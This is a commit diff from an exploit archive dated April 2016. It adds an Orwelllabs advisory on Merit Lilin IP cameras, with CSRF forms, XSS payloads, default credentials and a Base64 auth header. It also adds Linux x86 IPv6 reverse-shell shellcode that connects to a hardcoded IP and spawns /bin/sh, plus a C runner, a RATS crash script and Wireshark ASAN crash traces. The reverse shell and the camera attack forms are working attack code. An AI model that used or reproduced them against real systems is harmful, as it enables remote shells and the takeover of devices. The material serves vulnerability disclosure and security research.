DB: 2016-04-30

9 new exploits Linux x86 Reverse TCP Shellcode (ipv6) Observium 0.16.7533 - Cross Site Request Forgery Observium 0.16.7533 - Authenticated Arbitrary Command Execution Merit Lilin IP Cameras - Multiple Vulnerabilities Rough Auditing Tool for Security (RATS) 2.3 - Array Out of Block Crash Wireshark - dissect_2008_16_security_4 Stack-Based Buffer Overflow Wireshark - alloc_address_wmem Assertion Failure Wireshark - ett_zbee_zcl_pwr_prof_enphases Static Out-of-Bounds Read GLPi 0.90.2 - SQL Injection
2016-04-30 05:01:53 +00:00 · 2016-04-30 05:01:53 +00:00 · 7472667089
commit 7472667089
parent 875ff32145
10 changed files with 1238 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -35938,6 +35938,7 @@ id,file,description,date,author,platform,type,port
 39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (Powershell)",2016-04-21,b33f,windows,local,0
 39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x and 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0
 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0
+39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
 39725,platforms/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443
 39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443
 39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Local Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0
@ -35955,3 +35956,11 @@ id,file,description,date,author,platform,type,port
 39741,platforms/osx/local/39741.txt,"Mach Race OS X Local Privilege Escalation Exploit",2016-04-27,fG!,osx,local,0
 39742,platforms/php/remote/39742.txt,"PHP 7.0.5 - ZipArchive::getFrom* Integer Overflow",2016-04-28,"Hans Jerry Illikainen",php,remote,0
 39743,platforms/windows/dos/39743.txt,"Windows Kernel - win32k.sys TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)",2016-04-28,"Google Security Research",windows,dos,0
+39744,platforms/php/webapps/39744.html,"Observium 0.16.7533 - Cross Site Request Forgery",2016-04-29,"Dolev Farhi",php,webapps,80
+39745,platforms/php/webapps/39745.txt,"Observium 0.16.7533 - Authenticated Arbitrary Command Execution",2016-04-29,"Dolev Farhi",php,webapps,80
+39746,platforms/cgi/webapps/39746.txt,"Merit Lilin IP Cameras - Multiple Vulnerabilities",2016-04-29,Orwelllabs,cgi,webapps,80
+39747,platforms/linux/dos/39747.py,"Rough Auditing Tool for Security (RATS) 2.3 - Array Out of Block Crash",2016-04-29,"David Silveiro",linux,dos,0
+39748,platforms/multiple/dos/39748.txt,"Wireshark - dissect_2008_16_security_4 Stack-Based Buffer Overflow",2016-04-29,"Google Security Research",multiple,dos,0
+39749,platforms/multiple/dos/39749.txt,"Wireshark - alloc_address_wmem Assertion Failure",2016-04-29,"Google Security Research",multiple,dos,0
+39750,platforms/multiple/dos/39750.txt,"Wireshark - ett_zbee_zcl_pwr_prof_enphases Static Out-of-Bounds Read",2016-04-29,"Google Security Research",multiple,dos,0
+39751,platforms/php/webapps/39751.txt,"GLPi 0.90.2 - SQL Injection",2016-04-29,"High-Tech Bridge SA",php,webapps,80
--- a/platforms/cgi/webapps/39746.txt
+++ b/platforms/cgi/webapps/39746.txt
@ -0,0 +1,389 @@
+  _   _   _   _   _   _   _   _   _   _
+ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \
+( 0 | R | W | 3 | L | L | L | 4 | 8 | 5 )
+ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/
+
+     www.orwelllabs.com
+                      securityadivisory
+@orwelllabs
+   ;)(r
+
+
+By sitting in the alcove, and keeping well back,
+Winston was able to remain outside the range of the telescreen...
+
+
+* Adivisory Information
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+(+) Title: Merit Lilin IP Cameras Multiple Vulnerabilities
+(+) Vendor: Merit Lilin Enterprise Co., Ltd.
+(+) Research and Advisory: Orwelllabs
+(+) Adivisory URL:
+http://www.orwelllabs.com/2016/04/merit-lilin-ip-cameras-multiple_27.html
+(+) OLSA-ID: OLSA-2016-04-28
+(+) Affected Versions: L series products with firmware 1.4.36/1.2.02, OS
+Version: Linux 2.6.38/Linux 2.6.32
+(+) IoT Attack Surface: Device Administrative
+Interface/Authentication/Authorization
+(+) Owasp IoTTop10: I1, I2
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+
+* Adivisory Overview
+--+---------------------------------------------+------+--------------------------------------------
+id|         Vulnerability Title               | Rank |      Attack Surface
+--+---------------------------------------------+------+--------------------------------------------
+1 | Multiple Cross-site Request Forgery |  I1  | Insecure Web Interfaces
+2 | Multiple Cross-site Scripting/HTML Injection|  I1  | Insecure Web
+Interfaces
+3 | Hard-coded credentials   |  I1  | Insecure Web Interfaces
+4 | Cleartext sensitive data   |  I1  | Insecure Web Interfaces
+5 | Weak Passwords/Known credentials       |  I1  | Insecure Web Interfaces
+6 | Account lockout   |  I1  | Insecure Web Interfaces
+7 | Poorly Protected Credentials     |  I2  | Insufficient
+Authentication/Authorization
+--+---------------------------------------------+------+--------------------------------------------
+
+
+Vendor Background
+=================
+LILIN, is a global IP video manufacturer of IP video cameras, recording
+devices, and software with over 30 years of experience.
+
+
+1. Multiple Cross-site Request Forgery
+======================================
+Merit LILIN IP Cameras are prone to multiple cross-site request forgery
+vulnerabilities.
+
+
+(+) Technical Details and PoCs:
+-------------------------------
+# Basic >> System >> User
+
+> Changing 'admin' password to 'w!nst0nSm!th'
+
+<html>
+  <!-- Orwelllabs - Merit Lilin IP Camera - CSRF PoC -->
+  <body>
+    <form action="
+http://xxx.xxx.xxx.xxx/apply2.cgi?action=useredit&user_seq=1&user_account=admin&user_password=w!nst0nSm!th&user_priority=254&user_group=0
+">
+      <input type="submit" value="Submit form" />
+    </form>
+  </body>
+</html>
+
+# Basic >> Network >> DDNS
+> change DDNS information (user/hostname/password)
+
+<html>
+  <!-- Orwelllabs - Merit Lilin IP Camera - CSRF PoC -->
+  <body>
+    <form action="
+http://xxx.xxx.xxx.xxx/apply.cgi?action=ddns_apply&next_page=ddns.asp&ddns_type=0&ddns_flag=1&ddns_account=Winston&ddns_pwd=pass&ddns_hostname=smithwmachine&ddns_new_pwd=&ddns_wanip=
+">
+      <input type="submit" value="Submit form" />
+    </form>
+  </body>
+</html>
+
+
+# SNMP
+> change community/user/pass/pripass/v3rouser/etc.
+
+<html>
+  <!-- Orwelllabs - Merit Lilin IP Camera - CSRF PoC -->
+  <body>
+    <form action="
+http://xxx.xxx.xxx.xxx/snmp?snmpenable=0&v12rwcommunity=public&v12rocommunity=private&v3user=admin&v3authpass=password&v3pripass=w!nst0nSm!th&v3rwuser=public&v3rouser=private
+">
+      <input type="submit" value="Submit form" />
+    </form>
+  </body>
+</html>
+
+
+# Basic >> Network >> SIP
+> change sip_domain_server/sipreg_username/sipreg_password/sip_port=/etc.
+
+<html>
+  <!-- Orwelllabs - Merit Lilin IP Camera - CSRF PoC -->
+  <body>
+    <form action="
+http://xxx.xxx.xxx.xxx/apply.cgi?action=sip_apply&next_page=sip.asp&voip_flag=1&sip_domain_server=lilintw.ddnsipcam.com&sipreg_username=admin&sipreg_password=pass&sipreg_expires=0&sip_port=5060&audiortp_port=7078&videortp_port=9078
+">
+      <input type="submit" value="Submit form" />
+    </form>
+  </body>
+</html>
+
+
+
+2. Multiple Cross-site Scripting/HTML Injection
+====================-==========================
+Merit Lilin IP Cameras are prone to multiple cross-site scripting
+vulnerabilities.
+
+Technical Details and PoCs:
+---------------------------
+
+[SAMBA] Advance >> System >> SAMBA Service
+------------------------------------------
+%- Script: apply.cgi
+%- affected parameters:
+
+(+) action
+(+) SambaRecordState
+(+) SAMBA_OSD
+(+) SAMBARecordOption2
+(+) SAMBARecordFormat
+(+) SAMBAPreRecordTime
+(+) SAMBAServer
+(+) SAMBAServerPort
+(+) SAMBAServerAccount
+(+) SAMBAServerPassword
+(+) SAMBAServerDirectory
+
+%- [ *** XSS *** ] Payload(1) used:
+123%3Cimg%20src=%22x%20%22%20onerror=prompt%28%22Lilin_Password:%22%29%20/%3E
+
+%- URL: http://xxx.xxx.xxx.xxx/apply.cgi?action=[ *** XSS ***
+]&SambaRecordState=[ *** XSS *** ]&SAMBA_OSD=[ *** XSS ***
+]&SAMBARecordOption2=[ *** XSS *** ]&SAMBARecordFormat=[ *** XSS ***
+]&SAMBAPreRecordTime=[ *** XSS *** ]&SAMBAServer=[ *** XSS ***
+]&SAMBAServerPort=[ *** XSS *** ]&SAMBAServerAccount=[ *** XSS ***
+]&SAMBAServerPassword=[ *** XSS *** ]&SAMBAServerDirectory=[ *** XSS *** ]
+
+
+[General] -> Basic >> System >> General
+---------------------------------------
+- Affected script: apply.cgi
+- affected parameters:
+
+(+) action
+(+) next_page
+(+) SAMBAServerDirectory
+
+%- [ *** XSS *** ] Payload(2) used:
+%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
+
+%- URL http://xxx.xxx.xxx.xxx/apply.cgi?action=[ *** XSS *** ]&next_page=[
+*** XSS ***
+]&CAM_NAME=LR6122&ACTIVEX_OSD_NAME=LR6122&CAM_OSD=0&TIMER_OSD=0&ACTIVEX_OSD_ENABLE=0&ACTIVEX_MODE=0
+
+
+[HTTP POST Service] -> Advance >> Event >> HTTP POST Service
+------------------------------------------------------------
+- Affected script: apply.cgi
+- affected parameters:
+
+(+) AM_HTTP_JPEG
+(+) next_page*-*
+(+) HTTPPostPort*-*
+
+%- [ *** XSS *** ] Payload used:
+123%3Cimg%20src=%22x%20%22%20onerror=prompt%28%22Lilin_Password:%22%29%20/%3E
+*-* Payload(2)
+
+%- URL:
+http://xxx.xxx.xxx.xxx/apply.cgi?action=httppost_apply&next_page=httppost.asp&HTTPServer=192.168.0.2&HTTPPostPort=56082&HTTPAccount=LILIN&HTTPPassword=control4&AM_HTTP_JPEG=[
+*** XSS *** ]
+
+
+3. Hard-coded credentials
+=========================
+This application stores hard-coded credentials in html code.
+
+Technical Details and PoCs:
+---------------------------
+
+(+) GET -> http://xxx.xxx.xxx.xxx/new/index.htm
+HTML Source code:
+
+<script>
+var g_ScreenMode = GetCookie('ScreenMode');
+if(g_ScreenMode==null || g_ScreenMode=='' || g_ScreenMode==' ')
+{
+g_ScreenMode = 1;
+SetCookie('ScreenMode', 1);
+}
+var g_AD_OSD_FLAG = GV('0','0');
+//Profileno,Width,Height,Type,ScreenSwitch,Resolution,Cmd
+var g_CtrlInfo = new Ctrl_ProfileInfo('',0,0,'',g_ScreenMode,'','');
+var g_AD_RATE = Number('0');
+var g_video_port = Number('0');
+var g_spook_port = Number('554');
+var g_httpd_auth_account = 'admin'; <<<<<---- user
+var g_httpd_auth_passwd  = 'pass'; <<<<<---- pass
+var g_encode_mode = Number('0');
+var g_profile00_fps_dwell = 1000/Number('15');
+var g_profile01_fps_dwell = 1000/Number('5');
+var g_profile02_fps_dwell = 1000/Number('25');
+var g_profile03_fps_dwell = 1000/Number('0');
+var g_ACTIVEX_OSD_ENABLE = Number('0');
+var g_title_name = 'LR6122';
+var g_CAM_OSD = Number('0');
+var g_TIMER_OSD = Number('0');
+
+     [... Snip ...]
+
+
+(+) GET -> http://xxx.xxx.xxx.xxx/new/no_sd_file.htm
+HTML source code:
+
+[... Snip ...]
+//http://192.168.3.162/sdlist?dirlist=0
+//http://192.168.3.225/sdlist?filelist=2012081001
+//var g_AllDir =
+"2012080901,2012080902,2012080903,2012080904,2012080905,2012080906:2012081001,2012081002:2012081101,2012081111";
+//var g_AllFiles =
+"20120809010124.avi,20120809010234.avi,20120809010334.avi,20120809010434.avi,20120809010534.avi,20120809010643.avi";
+var g_httpd_auth_account = GV('admin','admin'); <<<<<---- here
+var g_httpd_auth_passwd = GV('pass','pass');     <<<<<---- here
+[... Snip ...]
+
+
+4. Cleartext sensitive data
+===========================
+Everything is trasmite over HTTP, including credentials,
+like this, when an administrador "submmit" the Samba configuration form
+(cleartext everywhere).
+
+Technical Details and PoCs:
+---------------------------
+
+GET
+/apply.cgi?action=sambarec_apply&SambaRecordState=0&SAMBA_OSD=0&SAMBARecordOption2=0&SAMBARecordFormat=0&SAMBAPreRecordTime=5&SAMBAServer=192.168.0.100&SAMBAServerPort=5000&SAMBAServerAccount=admin&SAMBAServerPassword=pass&SAMBAServerDirectory=/Public
+HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101
+Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Authorization: Basic YWRtaW46cGFzcw==
+Connection: keep-alive
+
+
+5. Weak Default Credentials/Known credentials
+=============================================
+The vast maiority of these devices remain with default credential
+admin:pass (cameras)/admin:1111 (NVR) and costumers are not obligated to
+change it during initial setup. The best
+
+6. Account Lockout
+==================
+There is no control to prevent brute force attacks and to lockout an
+account after X failed login attempts.
+
+I1.Impact
+---------
+Insecure web interfaces can result in data loss or corruption, lack of
+accountability, or denial of access and can lead to complete device
+takeover.
+
+
+7. Poorly Protected Credentials
+===============================
+An attacker in the same network is able to capture and decode the
+credentials as they aren't trasmited over HTTPs and are protected using
+just Base64 encoding.
+
+Technical Details and PoCs:
+---------------------------
+
+> GET Request of) Authentication Process
+
+GET /new/setup.htm HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101
+Firefox/45.0
+Accept: O|orwell/labs,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://xxx.xxx.xxx.xxx/new/setup.htm
+Cookie: lang=0; ScreenMode=O-Orw3lll@bs; profileno=0; uimode=1
+Connection: keep-alive
+Authorization: Basic YWRtaW46cGFzcw==
+
+
+Affected products
+=================
+L series with firmware 1.4.36/1.2.02, OS Version: Linux 2.6.38/Linux 2.6.32.
+
+LB1022X
+LR7224X
+LR7228X
+LR7424X
+LR7428X
+LR7722X
+LR7022
+LR7922
+LR6122X
+LR6022X
+LR2322X
+LR2122
+LR312
+LR832
+LR2522
+LD6122X
+LD2322X
+LD2122
+LD2222
+
+*Once this is related with a old bad design its probably that a large range
+of products are affected by reported issues.
+
+
+Timeline
++++++++
+2016-03-23: First attemp to contact Vendor
+2016-04-22: Request #13617 "Lilin Products Vulnerabilities" created
+2016-04-23: Attemp to contact vendor
+2016-04-25: Vendor response (ask for details)
+2016-04-27: According to the Vendor these issues are already know and will
+be remediated in the future.
+2016-04-28: Full disclosure
+
+
+About Orwelllabs
++++++++++++++++
+Orwelllabs is an independent security research lab interested in IoT, what
+means embedded devices and all its components like web applications, network,
+mobile applications and all surface areas prone to attack. Orwelllabs aims
+to study, learn and produce some intelligence around this vast and
+confusing big picture called smart cities. We have special appreciation for
+devices designed to provide security to these highly technological cities,
+also known as Iost (Internet of Things Security).
+
+
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt
+xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH
+xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf
+55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY
+U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I
+SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y
+d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI
+AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA
+Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE
+f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n
+pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW
+LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN
+95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965
+AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf
+ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U
+gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm
+tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK
+6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc
+TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb
+DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30
+MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf
+Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q
+FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU
+I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB
+C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37
+=IZYl
+-----END PGP PUBLIC KEY BLOCK-----
--- a/platforms/lin_x86/shellcode/39722.c
+++ b/platforms/lin_x86/shellcode/39722.c
@ -0,0 +1,200 @@
+/*
+
+# Title: linux x86 reverse tcp (ipv6)
+# Date: 22-04-2016
+# Exploit Author: Roziul Hasan Khan Shifat
+# Tested on: kali 2.0 and Ubuntu 14.04 LTS
+# Contact: shifath12@gmail.com
+
+*/
+
+/*
+section .text
+	global _start
+_start:
+
+;;socket()
+xor ebx,ebx
+mul ebx ;null out eax
+
+push byte 6
+push byte 0x1
+push byte 10
+
+mov ecx,esp
+
+mov al,102 ;socketcall()
+mov bl,1 ;socket()
+int 0x80
+
+mov esi,eax ;storing socket descriptor (we know return value of any syscall stores in eax)
+
+xor eax,eax
+
+mov al,2
+xor ebx,ebx
+int 80h
+
+
+cmp eax,ebx
+je connect
+ja exit
+
+;------------------
+
+;------------------------
+
+connect:
+
+xor ecx,ecx
+;-------------------------------------------------------
+;struct sockaddr_in6
+xor ebx,ebx
+
+push dword ebx ;sin6_scope_id 4 byte
+
+push dword 0x8140a8c0 ; only change it to Your ipv4 address (current ipv4 192.168.64.129)
+
+push word 0xffff
+push dword ebx
+push dword ebx
+push word bx ;sin6_addr 16 byte (ipv6 address ::ffff:192.168.64.129)
+
+push dword ebx ;sin6_flowinfo=4 byte
+
+push word 0xc005 ;sin6_port 2 byte (port 1472)
+
+push word 10 ;sa_family_t=2 byte 
+
+;end of struct sockaddr_in6
+
+mov ecx,esp
+
+;--------------------------------------------
+
+;;connect()
+
+push byte 28 ;sizeof ;struct sockaddr_in6
+
+push ecx
+
+push esi
+
+xor ebx,ebx
+xor eax,eax
+mov al,102
+mov bl,3 ;connect()
+mov ecx,esp
+int 0x80
+
+xor ebx,ebx
+
+cmp eax,ebx
+jne retry ;if it fails to connect ,it will  retry to connect to attacker after 10 seconds
+
+;dup2(sd,0)
+
+xor ecx,ecx
+mul ecx
+
+mov ebx,esi
+mov al,63
+int 80h
+
+;dup2(sd,1)
+
+xor eax,eax
+inc ecx
+
+mov ebx,esi
+mov al,63
+int 80h
+
+;;dup2(sd,2)
+
+xor eax,eax
+inc ecx
+
+mov ebx,esi
+mov al,63
+int 80h
+
+;;execve(/bin//sh)
+
+xor edx,edx
+mul edx
+
+push edx ;null terminated /bin//sh
+push 0x68732f2f
+push 0x6e69622f
+
+mov ebx,esp
+
+push edx
+push ebx
+
+mov ecx,esp
+
+mov al,11 ;execve()
+int 0x80
+
+ret
+
+;------------------------------------------------------
+
+retry:
+
+xor ebx,ebx
+
+push ebx
+push byte 10
+
+mul ebx
+mov ebx,esp
+
+mov al,0xa2 ;nanosleep()
+
+int 80h
+
+jmp connect
+
+ret
+
+;----------------------------
+exit:
+xor eax,eax
+mov al,1
+int 80h
+
+*/
+
+
+/* 
+to compile:
+
+$nasm -f elf filename.s
+$ld filename.o
+$./a.out
+
+to compile shellcode
+
+$gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+$./shellcode
+
+*/
+
+
+#include<string.h>
+#include<stdio.h>
+char shellcode[]="\x31\xdb\xf7\xe3\x6a\x06\x6a\x01\x6a\x0a\x89\xe1\xb0\x66\xb3\x01\xcd\x80\x89\xc6\x31\xc0\xb0\x02\x31\xdb\xcd\x80\x39\xd8\x74\x02\x77\x77\x31\xc9\x31\xdb\x53\x68\xc0\xa8\x40\x81\x66\x6a\xff\x53\x53\x66\x53\x53\x66\x68\x05\xc0\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x31\xdb\x31\xc0\xb0\x66\xb3\x03\x89\xe1\xcd\x80\x31\xdb\x39\xd8\x75\x36\x31\xc9\xf7\xe1\x89\xf3\xb0\x3f\xcd\x80\x31\xc0\x41\x89\xf3\xb0\x3f\xcd\x80\x31\xc0\x41\x89\xf3\xb0\x3f\xcd\x80\x31\xd2\xf7\xe2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\xc3\x31\xdb\x53\x6a\x0a\xf7\xe3\x89\xe3\xb0\xa2\xcd\x80\xeb\x8a\xc3\x31\xc0\xb0\x01\xcd\x80";
+
+
+int (*exec_shellcode)();
+main()
+{
+printf("Shellcode length: %ld\n",(long)strlen(shellcode));
+exec_shellcode=(int(*)())shellcode;
+(*exec_shellcode)();
+
+}
+
--- a/platforms/linux/dos/39747.py
+++ b/platforms/linux/dos/39747.py
@ -0,0 +1,38 @@
+# Exploit Title: RATS 2.3 Array Out of Block Crash
+# Date: 29th April 2016
+# Exploit Author: David Silveiro
+# Author Contact: twitter.com/david_silveiro
+# Website: Xino.co.uk
+# Software Link: https://code.google.com/archive/p/rough-auditing-tool-for-security/downloads
+# Version: RATS 2.3
+# Tested on: Ubuntu 14.04 LTS
+# CVE : 0 day
+
+from os import system
+
+
+def crash():
+
+
+    with open('crash.c', 'w') as file:
+        file.write("char g [MAX_SIZE];") # Out of Block array, causes crash
+
+    try:
+        com = ('rats -w3 --xml crash.c')
+        return system(com)
+
+    except:
+        print("Is RATS installed?")
+
+
+def main():
+
+    print("Author:   David Silveiro                      ")
+    print("Website:  Xino.co.uk                          ")
+    print("Title:    RATS 2.3 Array Out Of Block Crash \n")
+
+    crash()
+
+
+if __name__ == "__main__":
+    main()
--- a/platforms/multiple/dos/39748.txt
+++ b/platforms/multiple/dos/39748.txt
@ -0,0 +1,115 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=802
+
+The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+==27389==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff6e9e9a68 at pc 0x7fa9c4c2d7a3 bp 0x7fff6e9e96b0 sp 0x7fff6e9e96a8
+WRITE of size 8 at 0x7fff6e9e9a68 thread T0
+    #0 0x7fa9c4c2d7a2 in dissect_2008_16_security_4 wireshark/epan/dissectors/packet-dof.c:2662:32
+    #1 0x7fa9c4c2e3f6 in dof_dissect_pdu wireshark/epan/dissectors/packet-dof.c:12619:16
+    #2 0x7fa9c4c2ce35 in dof_dissect_pdu_as_field wireshark/epan/dissectors/packet-dof.c:12613:20
+    #3 0x7fa9c4c2a7ed in dissect_sgmp wireshark/epan/dissectors/packet-dof.c:8929:26
+    #4 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
+    #5 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
+    #6 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
+    #7 0x7fa9c4c68aca in dissect_app_common wireshark/epan/dissectors/packet-dof.c:5405:13
+    #8 0x7fa9c4c658b6 in dissect_dpp_2 wireshark/epan/dissectors/packet-dof.c:7370:27
+    #9 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
+    #10 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
+    #11 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
+    #12 0x7fa9c4c3a7a2 in dof_dissect_dpp_common wireshark/epan/dissectors/packet-dof.c:5490:13
+    #13 0x7fa9c4c5d5c0 in dissect_dnp_1 wireshark/epan/dissectors/packet-dof.c:6676:23
+    #14 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
+    #15 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
+    #16 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
+    #17 0x7fa9c4c39598 in dof_dissect_dnp_common wireshark/epan/dissectors/packet-dof.c:5528:9
+    #18 0x7fa9c4c390a0 in dissect_dof_common wireshark/epan/dissectors/packet-dof.c:5627:5
+    #19 0x7fa9c4c59e5c in dissect_dof_udp wireshark/epan/dissectors/packet-dof.c:5864:12
+    #20 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
+    #21 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
+    #22 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
+    #23 0x7fa9c40708f4 in dissector_try_uint wireshark/epan/packet.c:1216:9
+    #24 0x7fa9c62dddf0 in decode_udp_ports wireshark/epan/dissectors/packet-udp.c:585:7
+    #25 0x7fa9c62ecd90 in dissect wireshark/epan/dissectors/packet-udp.c:1080:5
+    #26 0x7fa9c62e0ae0 in dissect_udp wireshark/epan/dissectors/packet-udp.c:1086:3
+    #27 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
+    #28 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
+    #29 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
+    #30 0x7fa9c52a333b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1977:7
+    #31 0x7fa9c5312dba in dissect_ipv6 wireshark/epan/dissectors/packet-ipv6.c:2399:14
+    #32 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
+    #33 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
+    #34 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
+    #35 0x7fa9c40708f4 in dissector_try_uint wireshark/epan/packet.c:1216:9
+    #36 0x7fa9c5938ee2 in dissect_null wireshark/epan/dissectors/packet-null.c:457:12
+    #37 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
+    #38 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
+    #39 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
+    #40 0x7fa9c4e81105 in dissect_frame wireshark/epan/dissectors/packet-frame.c:492:11
+    #41 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
+    #42 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
+    #43 0x7fa9c407aa1e in call_dissector_only wireshark/epan/packet.c:2764:8
+    #44 0x7fa9c406b8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
+    #45 0x7fa9c406acd4 in dissect_record wireshark/epan/packet.c:539:3
+    #46 0x7fa9c401ddb9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
+    #47 0x52ef3f in process_packet wireshark/tshark.c:3727:5
+    #48 0x52830c in load_cap_file wireshark/tshark.c:3483:11
+    #49 0x51e67c in main wireshark/tshark.c:2192:13
+
+Address 0x7fff6e9e9a68 is located in stack of thread T0 at offset 168 in frame
+    #0 0x7fa9c4c2945f in dissect_sgmp wireshark/epan/dissectors/packet-dof.c:8718
+
+  This frame has 8 object(s):
+    [32, 34) 'app'
+    [48, 52) 'app_len'
+    [64, 66) 'version'
+    [80, 84) 'length'
+    [96, 128) 'key'
+    [160, 168) 'response' <== Memory access at offset 168 overflows this variable
+    [192, 194) 'version129'
